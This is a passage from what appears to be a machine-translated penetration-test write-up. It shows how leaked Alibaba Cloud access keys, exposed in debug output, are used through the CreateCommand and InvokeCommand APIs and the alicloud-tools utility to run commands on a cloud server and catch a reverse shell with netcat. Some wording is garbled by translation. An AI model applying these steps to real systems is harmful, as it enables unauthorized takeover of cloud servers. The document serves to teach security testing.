Shulou(Shulou.com)05/31 Report--

This article introduces an example analysis of CVM leaking Access Key to Getshell. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

Preface of 0x01

This penetration is an authorized penetration test, and the portal has found a bunch of innocuous small loopholes. Because the portal has too many sensitive features and no special features, there is no screenshot, and the background is based on experience to find out that it is not an explosion catalogue. Too much sensitive information is also omitted, so let's start from the background.

0x02 text

Get the website to collect a wave of information, the use of the pagoda, no pma loopholes, there are no other loopholes, there are no shortcuts or honestly infiltrate the site.

Open the web page to find that is to log in, decisively burst a wave, took out my old dictionary did not burst out, and finally gave up the explosion.

Run the directory did not run out of anything, empty, stuck in the login here to find the password these functions are not, CMS fingerprints are not found, are about to give up, blindly lost a login, reported a mistake (to be exact, debugging information), mention 12 points of mental inspection.

Summary: it is necessary to pay attention to fate to infiltrate this thing.

Keep looking down.

There are all Reids account passwords, and there is also a mysql account password on it, but the ports are not open to the public network, so we have to give up.

But then ALIYUN_ACCESSKEYID and ALIYUN_ACCESSKEYSECRET are the key.

The way to use it can be done step by step manually, but there are already great gods who have written tools and do not want to see the manual slide directly to the last part.

A word of nonsense: handwork has manual fun, step-by-step operation will give you a sense of achievement after you finish it. I personally think that manual work is actually a kind of enjoyment, and tools are just for convenience and can be used against time in red and blue confrontation.

Handmade articles

First of all, import the CVM with the line cloud butler, website address: https://yun.cloudbility.com/

Step: select Ali CVM-> Import key id and key secret-> Select Host-> Import (enter your name casually)

You can see it in the host management after the import is successful.

Click in to view the details, here you can reset the operating system password, but as penetration, do not click this, can not do irreversible operation. We only use this to get two pieces of data, that is, the instance ID and the network to which we belong, so we can get it and leave. Look down

Here we open Ali API Manager, which is a tool Ali provides to operation and maintenance developers, https://api.aliyun.com/#/?product=Ecs. Click the search box on the left to enter command. We will use CreateCommand and InvokeCommand,CreateCommand to create commands, and InvokeCommand to invoke commands. Keep looking down.

The Name part is random.

Type refers to the type of execution script.

RunBatScript: create a Bat script that runs in the Windows instance.

RunPowerShellScript: create a PowerShell script that runs in the Windows instance.

RunShellScript: create a Shell script that runs in the Linux instance.

CommandContent to execute the command, it should be noted that here is to fill in the base64 code.

Select python when you are finished.

Click to debug the SDK sample code, which will pop up a Cloud shell window, create a CreateCommand.py file, open CreateCommand.py with a vim editor, and modify accessKeyId and accessSecret.

When you execute CreateCommand.py, you will return a RequestId and CommandId, and record the CommandId, which will be used later in the call command.

Open InvokeCommand.

RegionId enter the network of the bank's cloud housekeeper.

CommandId fill in the CommandId returned by executing CreateCommand.py.

InstanceId enter the example ID, which is obtained by the cloud administrator.

Continue to click debug SDK sample code, will generate an InvokeCommand.py file, also use the vim editor to modify the accessKeyId and accessSecret.

After the modification, use nc to listen on the port and execute InvokeCommand.py.

Successful execution of the command rebounded shell, finished work.

Tools section

Tool address: https://github.com/iiiusky/alicloud-tools

How to use it:

View all instance information

AliCloud-Tools.exe-a-s ecs-list

When you get the sample ID, you can execute the command.

Carry out the order.

AliCloud-Tools.exe-a-s ecs exec-I-c "execute orders"

This is the end of the example analysis of CVM leaking Access Key to Getshell. I hope the above content can be of some help and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.